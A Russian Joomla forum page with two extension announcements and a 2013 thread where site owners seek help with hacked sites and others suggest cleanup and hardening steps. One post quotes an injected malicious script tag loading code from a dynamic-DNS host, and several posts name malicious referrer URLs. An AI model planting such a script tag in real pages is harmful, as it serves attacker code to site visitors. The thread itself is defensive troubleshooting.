Новости Joomla

IWS.BY VK app widget - Виджет приложения ВКонтакте для Joomla

IWS.BY VK app widget - Виджет приложения ВКонтакте для Joomla

👩‍💻 IWS.BY VK app widget - Виджет приложения ВКонтакте для Joomla.Модуль «Виджет приложения ВКонтакте» для Joomla поможет добавить на сайт виджет с карточкой приложения или игры из социальной сети ВКонтакте.У вас возникла потребность отобразить информацию о ваших приложениях или играх на сайте с кнопкой перехода в социальную сеть, то этот модуль для Вас. Вам не придется хранить информацию о приложении у себя на сайте, все данные получаются через публичное API социальной сети ВКонтакте. Хранение информации на стороне ВКонтакте позволит Вам не нагружать базу данных сайта.В модуле имеется всего несколько опций и полей, которые максимально упрощают публикацию виджета. Первая опция позволяет подключить публичное API социальной сети ВКонтакте, необходимое для работы виджетов. Следующее поле потребует ввести идентификатор приложения или игры, присвоенный в социальной сети ВКонтакте. Следующая опция позволит выбрать вид отображаемой информации в виджете.Модуль имеет 3 варианта отображения:- карточка- участники- кнопкаПоддерживаемые версии Joomla: Joomla 3, Joomla 4, Joomla 5.Страница расширенияJoomla Extensions Directory#joomla #расширения #vk

SW JProjects v.2.5.0 - компонент каталога цифровых проектов на Joomla

SW JProjects v.2.5.0 - компонент каталога цифровых проектов на Joomla

👩‍💻 SW JProjects v.2.5.0 - компонент каталога цифровых проектов на Joomla.Компонент - менеджер цифровых проектов для Joomla! CMS. Компонент обеспечивает создание каталога цифровых проектов и предоставляет возможность скачивания, в том числе с использованием лицензионных ключей.👩‍💻 v.2.5.0. Что нового?Схемы структур данных для серверов обновлений. Теперь с SW JProjects вы может создавать сервер обновлений не только для расширений Joomla, но и свои собственные. Например, вам нужно, чтобы структура данных сервера обновлений была другая и формат должен быть, например, не XML, а JSON. Формирование структуры данных для сервера обновлений расширений Joomla вынесено в отдельный плагин. Вы можете создать свой собственный плагин и реализовать в нём нужную вам структуру данных, добавив или наоборот исключив отображаемые данные. Сервер обновлений в компоненте по-прежнему отображает информацию о списке проектов и их версиях, о конкретном проекте и его changelog.Можно выбрать схему данных сервера обновлений глобально для всего компонента, выбрать другую схему данных для категории проектов, а так же выбрать схему в каждом проекте.

Разработчикам в качестве образца можно посмотреть плагин схемы данных для Joomla в составе компонента или же плагин-образец JSON-схемы на GitHub.
Группа плагинов swjprojects. Для нужд компонента создана группа плагинов swjprojects. В частности, в этой группе находится плагин структуры данных Joomla расширений для сервера обновлений.Изменение языковых констант. Изменены некоторые языковые константы в панели администратора. Если вы делали переопределение констант - переопределите их снова.👩‍💻 Joomla 6. Внесены изменения для корректной установки и работы компонента на Joomla 6. Компонент успешно протестирован на Joomla 6-beta2.Минимальная версия Joomla - 5. Подняты минимальные системные требования: Joomla 5.0.0 и PHP 8.1.
- Страница расширения👉 Плагин-образец кастомной JSON-схемы данных для сервера обновлений на GitHub.- GitHub расширения- Документация на GitHub- Joomla Extensions Directory#joomla #расширения

0 Пользователей и 1 Гость просматривают эту тему.
  • 792 Ответов
  • 288531 Просмотров
*

stardel

  • Завсегдатай
  • 1943
  • 22 / 0
не снижает нагрузку на сервак? Честно говоря по фигу) думаю с хоста за это не попрут)
нет( у меня простой хост((
Ограничение доступа то есть у меня..тока там тупо просят ввести путь и всё)  а как оно работает и что делает? Просто никого не пускает что ли? И я так понимаю что лучше баннить в ISP их всех а не на каждом сайте?
картинок нет) и не было вроде как...
ещё вот смотрю и вижу такое в error log, это просто то что юзер пришёл с Яндекса и всё?
Спойлер
[свернуть]
« Последнее редактирование: 12.10.2013, 17:26:52 от stardel »
*

draff

  • Гуру
  • 5801
  • 434 / 7
  • ищу работу
Ограничение доступа то есть у меня..тока там тупо просят ввести путь и всё)  а как оно работает и что делает? Просто никого не пускает что ли?
Эта настройка создает http-авторизацию for /administrator
А что на вирт.хосте доступно iptables ?
« Последнее редактирование: 12.10.2013, 18:13:48 от draff »
*

stardel

  • Завсегдатай
  • 1943
  • 22 / 0
draff а смысл делать  http-авторизацию  ? сайт из за этого недоступен всем(
кстати есть вопрос: куда писать чтобы сняли с сайта ограничение что он не доступен и на нём вирус? Вроде год назад писал в Яндекс-суппорт...но точно не помню...
« Последнее редактирование: 12.10.2013, 19:02:52 от stardel »
*

draff

  • Гуру
  • 5801
  • 434 / 7
  • ищу работу
draff а смысл делать  http-авторизацию  ? сайт из за этого недоступен всем(
кстати есть вопрос: куда писать чтобы сняли с сайта ограничение что он не доступен и на нём вирус? Вроде год назад писал в Яндекс-суппорт...но точно не помню...
Я думал мы обсуждаем защиту от брутфорс. И пост свой подправил.
Очистишь, а потом Платону.
*

stardel

  • Завсегдатай
  • 1943
  • 22 / 0
то есть задавать ограничение доступа  например так?  /www/moisait.ru/administrator   что то он ругается( пишет что такой путь уже есть...чего ему надо? Щукину написал из панели Вебмастера)
*

siao

  • Захожу иногда
  • 233
  • 4 / 0
Здравствуйте!

скажите, на сайт мне сейчас идет атака на administrator/index.php
20тыс запросов за сутки, сообщает мне хостер

скажите, хостер вообще как-то должен это дело пресекать? защищать пользователей своих или нет?
вот они мне советуют - поставьте этот плагин - http://extensions.joomla.org/extensions/access-a-security/site-security/login-protection/8386
в его описании сказано, что он умеет блокировать бэкенд юзеров, которые пытаются войти в панель управления неверно набирая пароль энное кол-во раз.
и что? что мне толку от такого плагина, поток запросов не уменьшится же

и потом мне интересно, а как хостер увидел, что запросы идут именно к администратору? когда в лог файлах я вижу бесконечный поток GET к 404 странице и POST к компоненту komento. один IP и такая пара - GET-POST (404-komento), и таких IP много.

еще нашла на сайте два архива admin и doc, которые раскрылись в images и еще куда-то не помню уже, удалила
а в папке cache все время появляется папка fof, удалить невозможно -((
пароль к ftp поменяла, к БД тоже.

что же делать?
*

draff

  • Гуру
  • 5801
  • 434 / 7
  • ищу работу
.htaccess  в папку /administrator
Код
Order Deny,Allow
Deny from all
Временно. Но лучше таки
Цитировать
http-авторизацию for /administrator
И чистить сайт.
*

siao

  • Захожу иногда
  • 233
  • 4 / 0

а в папке cache все время появляется папка fof, удалить невозможно -((


оказалось это что-то от akeeba (у меня стоит akeebasubs на сайте) и у них оказывается есть такой фреймворк.
https://github.com/akeeba/fof
и в админке компонента есть такая папка с одним файлом include.php

удивляет то, что в кеше fof в этом файле содержится список всех таблицБД и другая информация, права у него хотя бы 664

атака, шедшая три дня, сошла на нет.
*

verstalshik

  • Завсегдатай
  • 1754
  • 95 / 1
оказалось это что-то от akeeba (у меня стоит akeebasubs на сайте) и у них оказывается есть такой фреймворк.
https://github.com/akeeba/fof
удивляет то, что в кеше fof в этом файле содержится список всех таблицБД и другая информация, права у него хотя бы 664
а что ценного в списке таблиц?))))
нууу, ребята!
❶ НЕ СПРАВЛЯЕШЬСЯ САМ???  Поможем тут...  ❷ Калькулятор доставки - ЗАКАЖИ!!!...  ❸ Каталог компаний - ЖМИ!!!...  ❹ НОВИЧКИ! ВСЕ сюда! Первая консультация БЕСПЛАТНО!!
*

siao

  • Захожу иногда
  • 233
  • 4 / 0
а что ценного в списке таблиц?))))
нууу, ребята!

казалось бы да - зачем? -) (но я не программист, я даже предположить не могу -) но после сноса данного компонента, перестала в кеше появлятся и эта папка.

зато вот после удаления каталога images/doc на сайте пошли ошибки -
 [Mon Oct 21 09:50:23 2013] [error] [client 64.122.169.98] File does not exist: /home/***.ru/images/doc, referer: http://bataco.net/shop/mypage/google/index.htm

и этот реферер просто офигевает и заваливает теперь меня ошибками, обращаясь к этому удаленному каталогу.
касперский на этот адрес не пускает.
и еще вот этот http://sritvnews.lk/google.zipgrt/index.htm

*

siao

  • Захожу иногда
  • 233
  • 4 / 0
у меня в связи с произошедшим вопрос такой

что это собственно было? -)))
1) два архивных файла admin.zip и doc.zip появились в директории моего домена без моей помощи (как залили?)
2) они были распакованы в images/doc
3) на сайт три дня валились с разных IP десятки тысяч запросов, которые в логах показывались как GET к 404 странице и POST к странице компонента комментариев. и так с одного IP шла пара запросов - GET-POST, GET-POST
сайт естесственно то совсем падал, то очень медленно работал.

хостер мне сказал, что в логах у него (а почему у меня таких нет и я этого не вижу?) он видит, что идет атака на папку /administrator

и вопрос - зачем атаковать папку администратор, если ты уже сумел залить на сайт два файла и их там даже распаковать?
что это было, Берримор?


upd.
а хорошо оказывается проверять таким образом - скачивать себе на комп свой сайт filezillой, а касперский при этом проверяет ведь...
вот и выловил мне бэкдор троянскую программу с этим bataco.net
написала в хостинг этого сайта, какие козлы у них размещаются (японцы какие-то)
« Последнее редактирование: 21.10.2013, 13:26:13 от siao »
*

stardel

  • Завсегдатай
  • 1943
  • 22 / 0
Обнаружил в корне аккаунта на ftp файлик странный ....называется .codepage содержимое простое: ANSI_X3.4-1968 вроде всё безобидно) но раньше его там не было...что это?  просто кодировка? или ещё что то?
*

ua4frr

  • Новичок
  • 6
  • 0 / 0
Всем привет))) Прошу помощи у знающих...с периодичностью в 1-2 дня какая то "нехороший человек" вставляет "левый код" в индексный файл шаблона сайта, код такой:
Спойлер
[свернуть]
Код вставляется в одно и тоже место шаблона, после строк:
<h1 id="name-text" class="art-Logo-name"><a href="<?php echo $baseUrl; ?>

Движок 1.5.26, вроде как все обновил (компоненты, модули, плагины), пароли менял ни один раз, админка закрыта доп.авторизацией, по ftp стоит ограничение по доступу.
Не могу понять откуда ноги растут((( Буду признателен за любой совет или помощь)))
*

wishlight

  • Гуру
  • 5059
  • 315 / 1
  • От 300 руб быстрый хостинг. Сервера.
Опять же остался или шелл или еще какой-то вид доступа. Тут cURL советовали отключать, но это не выход. Надо искать проблему.
*

ua4frr

  • Новичок
  • 6
  • 0 / 0
Опять же остался или шелл или еще какой-то вид доступа. Тут cURL советовали отключать, но это не выход. Надо искать проблему.
Угу, как раз найти то и не получается, логи каждый раз при возникновении изучаю, не нахожу чтоб было обращение к индексному файлу шаблона, всех, кто ломятся в админку присекаю на корню в .htaccess, равно как и тех кто сделать "POST" хочет в неразрешенных местах, прошел демкой сканера ssf.php, нашел 2 подозрительных "картинки" в компоненте баннеров (это было 25-го числа), убил их, вздохнул, что видимо нашел и давно они там оказывается "висели", а тут сегодня опять тоже самое в индексе шаблона, каких либо новых файлов не нашел на хостинге у себя((((
*

flyingspook

  • Moderator
  • 3590
  • 247 / 9
не все нашли файлы проверяются вручную и глазами автоматического нет и не будет потратьте время на просмотр всех файлов на которые показывает сканер и найдете еще что либо
чистка это не просто иногда на сайт уходит по 8-10часов непрерывной работы у хорошо знающих что искать, а успокоится найдя один два файла не стоит, их сейчас не один десяток пихают а то и не одну сотню

забыл как всегда написать проверьте еще если существуют и оседании сайты, так же очень тщательно ;)
*

wishlight

  • Гуру
  • 5059
  • 315 / 1
  • От 300 руб быстрый хостинг. Сервера.
Да, с некоторыми несколько дней сидеть приходится.
*

alinz

  • Новичок
  • 6
  • 0 / 0
Проблема с некоторыми сайтами на хостинг аккаунте. Первый сайт Joomla 2.5.14, второй - форум рнрвв, и там и там время от времени появляется одна и таже проблема, перед закрывающимся тегом head, прописывается строчка вируса
Код
<script type="text/javascript" src="//rdomn1383054303.hopto.me/jquery.js?1383054403"></script></head>
, урлы бывают разные, после очистки устаревшего кеша на Joomla и кеша на форуме строчка пропадает, но потом через время появляется опять. На хостинге есть еще сайты на Joomla 1.5, Wordpress, никаких проблем на них не наблюдается. Скачивал сайт на локалку, проверял антивирусами - ничего, перекодировал URL вируса в base64, искал по файлам - не нашел ничего. Закачал айболит, нашел он кучу подозрительных файлов и сигнатур. Кто может помочь с очисткой и настройкой сайтов на защиту от вирусов ?
*

novoross

  • Осваиваюсь на форуме
  • 26
  • 0 / 0
а в каких div-ах сидит этот код? разве нельзя по дивам хоть примерно определить от куда ссылка генерируется?
*

wishlight

  • Гуру
  • 5059
  • 315 / 1
  • От 300 руб быстрый хостинг. Сервера.
По возможности, если много сайтов, лучше брать vps и разносить по разным аккаунтам.
*

alinz

  • Новичок
  • 6
  • 0 / 0
По возможности, если много сайтов, лучше брать vps и разносить по разным аккаунтам. - так и сделано, у нас впс, на моем акаунте мои сайты, но, на других акк. на сервере также были попадались вирусы, кстати в одно и тоже время начали появляться

а в каких div-ах сидит этот код? разве нельзя по дивам хоть примерно определить от куда ссылка генерируется? - не могу, кусок кода привел, больше ничего там невидно, если бы в боди был, та так в голове страницы.
*

novoross

  • Осваиваюсь на форуме
  • 26
  • 0 / 0
*

alinz

  • Новичок
  • 6
  • 0 / 0
Если создавал тему на серче, то наверно читал ), но если не знаеш за что отвечает кусок кода, то пытаться удалить и ждать пару дней пока вирус опять не появится на сайте и убедиться что это не оно, как то неправильно.
*

ua4frr

  • Новичок
  • 6
  • 0 / 0
забыл как всегда написать проверьте еще если существуют и оседании сайты, так же очень тщательно ;)
В эту фразу не совсем понял, буду рад пояснениям)))
P.S. получается, мне нужно выкачать сайт себе локально, на хостинге сканером пройтись - и что он (сканер) найдет, проверять вручную...
*

draff

  • Гуру
  • 5801
  • 434 / 7
  • ищу работу
Проблема с некоторыми сайтами на хостинг аккаунте. Первый сайт Joomla 2.5.14, второй - форум рнрвв, и там и там время от времени появляется одна и таже проблема, перед закрывающимся тегом head, прописывается строчка вируса
Код
<script type="text/javascript" src="//rdomn1383054303.hopto.me/jquery.js?1383054403"></script></head>
, урлы бывают разные, после очистки устаревшего кеша на Joomla и кеша на форуме строчка пропадает, Кто может помочь с очисткой и настройкой сайтов на защиту от вирусов ?
Начни с самого простого- наведи порядок с пользователями.Отключи регистрацию юзеров и проверь права у имеющихся юзеров.
 Проверь модули, в папке /modules
И на время отключи cURL и права установи на папки 500, на файлы 400. Предварительно очисти кеш в /cache
*

flyingspook

  • Moderator
  • 3590
  • 247 / 9
@ua4frr
если вы все сделаете автоматически то вам орден положен
Цитировать
что он (сканер) найдет, проверять вручную...
да
можно сканировать на хосте закрыв сайт от общего доступа что многие не делают, это правило любой чистки
нет ни одного сканера в общем доступе для авто очистки сайта, можно найти из массы места где может быть "зараза" можно зная что именно автоматически удалить из всех файлов или подменить на что то свое

но нет и не будет ни когда авто очистки сайта нажатием одной кнопки (если сами разработчики не внесут такое решение в CMS и не будет сторонних расширений) и чистка сайта и устранение уязвимости, это только ручная работа которую делают видя глазами и чистя руками, каждый сайт это индивидуальный проект, каждый взлом отличается, даже массовые взломы периодически меняют алгоритм и файлы и коды

посмотрите сколько тем поднимается в интернете, что "почистил и опять", и посмотрите на даты этих сообщений, многие сами не зная что делать мучаются по полгода

все сервисы и сканеры делают просто облегчение работы (они указывают на места где может быть причина на которую надо посмотреть и понять она ли это, и что бы посмотреть не надо иметь навыки того же программирования надо просто аналитически мыслить) и каждый из них делает это по своему и пользователь в праве выбирать то что ему проще и подходит именно для него
*

ua4frr

  • Новичок
  • 6
  • 0 / 0
flyingspook, спасибо за разъяснение, буду пробовать, как раз нужных знаний то и не хватает к сожаленнию((( в плане программирования, но раньше так и действовал, как вы и пишете - т.е. анализируя все глазами, сравнивая размеры файлов и даты их изменения, сравнивая структуру папок в корне сайта, наличие "левых" файлов и прочее, в общем то удалось победить зимой этого года всякие заражения сайта, чем был не сказанно рад, а тут опять вылезло, как бы вреда не приносит, что самое нитересное, т.е. ни Яндекс ни Google не сообщают мне что есть заражение (поисковые машины тоже все четко выдают мне без редиректов), и при обращении к сайту антивирусы тоже молчат, часть  левого кода отображается поверх логотипа сайта, т.е. его строка как бы наложена на изображение, только по этому сразу начинаю искать, точнее уже давно знаю где эта строка, чтобы удалить ее - а вот найти черный вход пока не получается, поэтому здесь и попросил помощи...есть еще у меня подозрение что хостинг дырявый, на котром сайт расположен...
*

alinz

  • Новичок
  • 6
  • 0 / 0
Начни с самого простого- наведи порядок с пользователями.Отключи регистрацию юзеров и проверь права у имеющихся юзеров.
 Проверь модули, в папке /modules
И на время отключи cURL и права установи на папки 500, на файлы 400. Предварительно очисти кеш в /cache

Уже начал работать в этом направлении, удаляю все лишнее, права отключу на все, что можна. Пока вирус появляется пару раз на день, чищу кеш и ищу причины.
*

flyingspook

  • Moderator
  • 3590
  • 247 / 9
Цитировать
есть еще у меня подозрение что хостинг дырявый, на котром сайт расположен...
не исключается очень много сайтов переносили с таких хостов, тут еще может если у вас же есть соседний ваш же сайт то и на нем быть уязвимость но его не станут за рожать да бы не светить а соседний с хорошими показателями или просто, будут, надо смотреть что установлено и что не успели обновить своевременно, или если обновляли после зимы то может уже было поздно, и не исключено что зимой тоже не дочистили, сами иногда промахиваемся в работе не секрет, но нам зная что искать проще потом если что случается поправить, но "ошибки" бывают не скрываю просто потом приходится еще раз если что то происходит все просматривать, это издержки чистки, тут борьба своего рода между "спрятавшимся" и тем кто ищет
*

ua4frr

  • Новичок
  • 6
  • 0 / 0
flyingspook, я могу вам в ЛС написать, каким хостингом пользуемся - я так думаю у вас опыта общения с ними больше чем у меня, т.е. вы сможете сказать "косячный" хостинг или нет или какое среднее мнение, хостинг мне достался как бы в наследство от конторы, который мы заказывали сделать сайт для нас, потом контора тихо "померла" и пришлось уже самому разбираться, Joomla ставили и затачивали под себя уже самостоятельно, сайт всего один у нас, на своем домене...
Сегодня утром полез по ftp еще раз глазами пройтись - первым делом в шаблоны, индексный файл опять с измененной датой от вчерашнего числа, хотя я ни чего не менял, открыл его - косяков вроде нет, НО структура файла не понравилась - Notepad++ видит его в формате Мака почему то, много свободных строк, размер отличается, НО лишнего кода нет, все строки сверил с копией, перезалил его на хостинг с копией...сайт работает штатно, поисковики выдают нужные результаты...
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

Редирект на спам ссылки. Как лчить?

Автор Евгений1980

Ответов: 2
Просмотров: 2149
Последний ответ 14.02.2024, 13:15:59
от wishlight
Скрипт для поиска вирусов и вредоносных скриптов на сайте "AI-Bolit"

Автор revisium

Ответов: 110
Просмотров: 69743
Последний ответ 30.08.2023, 12:53:33
от SeBun
Вирус редирект или взлом с редиректом Joomla 3.10

Автор Wany205

Ответов: 1
Просмотров: 3066
Последний ответ 25.05.2023, 08:49:57
от Театрал
Re: Кажется вирус на сайте

Автор motokraft

Ответов: 24
Просмотров: 4706
Последний ответ 04.05.2022, 14:04:17
от ProtectYourSite
Хостинг пишет, что найден вирус в /media/com_media/js/media-manager-es5.js

Автор AlexP750

Ответов: 6
Просмотров: 3331
Последний ответ 22.02.2022, 11:38:15
от AlexP750